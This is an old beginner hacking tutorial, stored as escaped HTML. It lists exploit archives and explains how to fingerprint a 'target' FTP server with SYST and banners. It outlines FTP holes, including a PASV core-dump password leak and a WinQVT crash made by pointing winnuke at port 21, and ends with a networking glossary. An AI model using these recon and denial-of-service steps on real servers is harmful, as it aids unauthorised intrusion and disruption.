To find FTP exploits, try searching the following websites (or join the BugTraq mailing list at &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.securityfocus.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.securityfocus.com&quot;&gt;www.securityfocus.com&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;):&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
CERT (Computer Emergency Response Team) - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://cert.org/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://cert.org&quot;&gt;http://cert.org&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
X-Force Search (simplest) - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.iss.net/cgi-bin/xforce/xforce_index.pl&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.iss.net/cgi-bin/xforce/xforce_index.pl&quot;&gt;http://www.iss.net/cgi-bin/xforce/xforce_index.pl&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Packet Storm - packetstorm.genocide2600.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
BugTraq Archives - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.securityfocus.com/level2/bottom.html?go=search&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.securityfocus.com/level2/bottom.html?go=search&quot;&gt;http://www.securityfocus.com/level2/bottom.html?go=search&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Fyodor&#39;s Exploit World - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.insecure.org/sploits.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.insecure.org/sploits.html&quot;&gt;http://www.insecure.org/sploits.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Spikeman&#39;s Denial Of Service Website (for DoS(9) attacks against FTP servers) - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.genocide2600.com/~spikeman/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.genocide2600.com/~spikeman/&quot;&gt;http://www.genocide2600.com/~spikeman/&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
RootShell - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.rootshell.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.rootshell.com&quot;&gt;http://www.rootshell.com&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Slashdot - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.slashdot.org/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.slashdot.org&quot;&gt;http://www.slashdot.org&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Data - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.hideaway.net/data.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.hideaway.net/data.html&quot;&gt;http://www.hideaway.net/data.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
(Please report all dead links to &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;mailto:barakirs@netvision.net.il&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: mailto:barakirs@netvision.net.il&quot;&gt;barakirs@netvision.net.il&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Note: one might think that the above sites are considered illegal, since
 they feature explanations about security holes and how to exploit them.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Well, screw one. These things are called &quot;advisories&quot; and they allow you
 to find holes on your own PC and fix them. Whether you use this 
information to secure yourself or hack others is your own choice. It&#39;s 
the difference between legitimate and illegal.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
After you get to one of the following search sites (I recommend the BugTraq Archives) search for the keywords you want.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
For example: you find out(5) that your target is using this OS with this
 FTP server and this Webserver program etc&#39;. Try combining all of those 
pieces of information and I&#39;m sure you&#39;ll find the holes that fit you 
the most.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
You can also try searching holes on your own computer.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Speaking about holes, we will explain about many security holes on the upcoming Sendmail tutorial (see blacksun.box.sk).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Now, for several selected FTP holes.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Selected FTP Holes&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
******************&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The following FTP holes aren&#39;t new or extraordinary or incredibly 
fantastic or anything of that sort of matter. They&#39;re just good for 
learning.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I picked some interesting FTP holes and written a small explanation about them just to get the newbies started.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Note: the sites I got these from aren&#39;t &quot;evil hacking sites&quot;. These 
explanations are called advisories and they are meant to be used by 
people who want to fix bugs on their systems. Whether you use them for 
that purpose or others is none of our business.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
1) Some FTP daemons allows a premature PASV command, which can cause 
some FTP daemons to crash with a core dump(9). FTP core dumps can be 
used to salvage encrypted passwords, bypassing any shadow password 
scheme.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
It is not known exactly which servers are immune to this and which are 
not, and the only workaround right now is to get a newer FTP server 
program.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Also see &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.genocide2600.com/~spikeman/bisonware3.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.genocide2600.com/~spikeman/bisonware3.html&quot;&gt;http://www.genocide2600.com/~spikeman/bisonware3.html&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt; for a DoS(9) attack against BisonWare FTP Server 3.5 similar to this hole.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
2) FTP Bounce Attack (too long, see &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1425&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1425&quot;&gt;http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1425&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt; (From BugTraq))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
3) Local bug in FTP Daemon (too long, see &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1345&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1345&quot;&gt;http://www.netspace.org/cgi-bin/wa?A2=ind9507B&amp;amp;L=bugtraq&amp;amp;P=R1345&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt; (From BugTraq))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
4) (Quotes in partfrom BugTraq) Impact: Anybody from outside can 
shutdown your pc ftp server. And if u are under win3.1 the system will 
crash.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Program: WinQVT/NET&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Version: All versions.. 16 and 32 bits&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Solution.. dont use it or upgrade&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Exploit: Just Send a OOB (Out of Band) to port 21,&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Exploit for dummies: Take any winnuke, start it, and when u find a &quot;139&quot; change it to &quot;21&quot; instead.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
OK, I know this is stupid....... :P. But maybe somebody will need it.. who knows...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Note: A patched version of NT 4.0 isn&#39;t vulnerable to this running MS&#39;s 
FTP server.&amp;nbsp; I haven&#39;t had a chance to test an unpatched server, but 
IIRC, I did check the FTP port when the OOB problem was first reported 
and it didn&#39;t cause a crash.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I would suspect that this could be a DOS/Win problem in general, and might not be specific to the WinQVT package.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I hope this helped you learn how to find holes. There will be much more examples in the Sendmail tutorial.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The Stupid Bug Corner&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
---------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I found this on an &quot;elite&quot; website made by a bunch of &quot;elite&quot; &quot;hackers&quot;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
They said that in order to &quot;hack an FTP&quot; you need to connect to it and send the following commands:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
quote user ftp&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
quote cwd ~root&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
quote pass ftp&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Basically, what the so-called hacker is trying to do here is to enter a 
username to get into the system, change the user to root(7) and then 
enter a password for the username.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
This only works on VERY badly-configured FTP servers (the author 
mentioned that &quot;this doesn&#39;t work on every FTP server&quot;. Well, I&#39;ve got 
news for you - this doesn&#39;t work. Period. Unless you&#39;re talking about 
some 5 years old boy who just got a computer and clicked on some buttons
 and accidently set up an FTP server).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Appendix A: the SYST command&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
----------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Entering the SYST command while connected to an FTP server often reveals
 valuable information on a system, such as the OS, which version and 
information about the FTP server.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Get access to an FTP server somehow (by using a username and a password you know or by using anonymous login - login: anonymous &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://password:your-email-address@your.isp/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://password:your-email-address@your.isp&quot;&gt;password:your-email-address@your.isp&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;.
 You could also enter someone else&#39;s Email address, the server doesn&#39;t 
actually verifies the address you send or anything) and then type the 
SYST command.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Newbies Corner&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
--------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
1. Protocol - a set of rules and regulations, similar to a language. 
When two computers know the same protocol, they can use it to 
communicate with each other.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
2. Port - (for the more technical explanation of what ports are, see the
 end of this explanation) ports are like holes that enable things (data,
 in this case) to come in or out of them.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
There are physical ports and software ports on your computer. Physical 
ports are those slots on the back of your computer, your monitor etc&#39;. 
Now, software ports are used when connecting to other computers.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
For example: I just bought a new computer and I want to turn it into a 
webserver (I want to enable people to access selecetd web pages, 
pictures, cgi and java scripts or applets, programs etc&#39; that are 
located on my computer). In order for that to happen, I need to install a
 webserver software.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The webserver software opens a port on my computer and names it port 80. Then it listens to incoming connections on that port.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
When someone starts his Internet browser (Netscape, Lynx, Microsoft 
Explorer etc&#39;) and surfs to my website, his browser connects to my 
computer on port 80 and then sends HTTP commands that my webserver 
program can understand into it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
My webserver program quickly picks up the incoming data and then sends 
it back into a port that the surfer&#39;s browser opened on the surfer&#39;s 
computer. The browser will listen on that port and wait for the data 
(the HTML page, the picture, the program etc&#39;) to come in through it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
There are different ports for different services (we&#39;ll get to that) so 
data won&#39;t mix up. Imagine your browser getting data your FTP client was
 supposed to get.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I hope you got the main idea of what a port is.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Now, there are three kinds of ports: well-known ports, registered ports and dynamic/private ports.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The well known ports are those from 0 through 1023. These are default 
ports for several services (a webserver is a service because it listens 
for connections from remote computers and then sends something back). 
For example: the default port for webservers is 80. Else, how would your
 browser know which port he has to access?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Now, the registered ports are those from 1024 through 49151. These ports are reserved for several programs. For example: ICQ (&lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.icq.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.icq.com&quot;&gt;www.icq.com&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;) reserves a port and listens to incoming messages on it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The dynamic and/or private ports are those from 49152 through 65535, and can be used by anyone for any given purpose.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&quot;Techy Explanation&quot; - To grant simultaneous access to the TCP module, TCP provides a user interface called a port.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Ports are used by the kernel to identify network processes. These are 
strictly transport layer entities (that is to say that IP could care 
less about them).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Together with an IP address, a TCP port provides provides an endpoint for network communications.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
In fact, at any given moment *all* Internet connections can be described
 by 4 numbers: the source IP address and source port and the destination
 IP address and destination port.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Servers are bound to &#39;well-known&#39; ports so that they may be located on a standard port on different systems.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
For example, the telnet daemon sits on TCP port 23, the FTP daemon sits 
on TCP port 21, the rlogin daemon sits on TCP port 513 etc&#39;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Important note about well-known ports: services (daemons waiting for 
incoming connections that serve people in some way) on these ports can 
be only ran by root, so inferior users won&#39;t start messing up with 
important ports.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
3. Mirror site - a website which is an exact copy of the original website which is hosted by a different server.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Mirror sites can be used to speed up downloads/uploads. For example: 
instead of downloading/uploading from/to the main tucows webserver, 
located somewhere distantly from my home, I can simply do it from one of
 their Israeli mirrors (mirror site located in Israel, my country) and 
that way the downloads/uploads would go faster.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
4. Path - UNIX example: if a file is located at /etc/passwd, the file&#39;s path would be /etc.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS/Windows example: if a file is located at c:\windows\win.exe, the file&#39;s path would be c:\windows.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
There are two kinds of paths: a complete path and a relative path.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Complete path on DOS/Windows: if the file is located on 
c:\program files\quickview plus\ then this is the file&#39;s complete path.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Complete path on UNIX: if the file is located at /usr/local/sbin then this is the file&#39;s complete path.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Relative path on DOS/Windows: if the current directory (the 
directory you are on at the moment) is c:\windows and the target file is
 located at c:\windows\temp then the relative path to this file is temp.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Relative path on UNIX: if the current directory is /usr/nobody
 and the file is located at /usr/nobody/public_html/cgi-bin then the 
file&#39;s relative path is public_html/cgi-bin.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
5. Client / Server programs - A client program is a program that uses a resource offered by another program/computer.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
A server program is a program that supplies resources to client programs.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Example: Client=Netscape Navigator. Server=Apache version 1.6.6 (a 
webserver, meaning a program that lets people who use Internet browsers 
to download specific web pages, pictures, files etc&#39; from the computer 
it is installed on).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
6. How to find out information about remote hosts - the best way to find
 out information is too look at daemon(6) banners. Daemon banners are 
small pieces of information some daemons return when connected to in 
order for the remote machine (the one connecting to the daemon) to know 
how to interact with them better.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Try connecting to port 80 (webserver) and sending some commands like get
 and then looking at the banner. You may also try Sendmail (see next 
tutorial) on port 25, Telnet on port 23, FTP on port 21 or whatever you 
can come up with.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
7. Daemon - a program that listens for incoming connections from remote machines on a specified port(2) and interacts with them.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
8. Root - also referred as superuser, because his permissions are 
endless. His UID (User ID number, an identification number and user on a
 UNIX system has) and GID (Group ID. You can create groups and give them
 several permissions. For example: everyone from the accounting 
department can read and execute all the files on this directory, etc&#39;) 
are always 0 (except on very altered boxes).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Once you are root, you can do practically anything on a system.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Core Dump - when a program crashes it dumps all the core (all the info 
it handles that isn&#39;t saved on disk, meaning all of the program&#39;s stuff 
that are on the RAM chip) into a temporary file.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
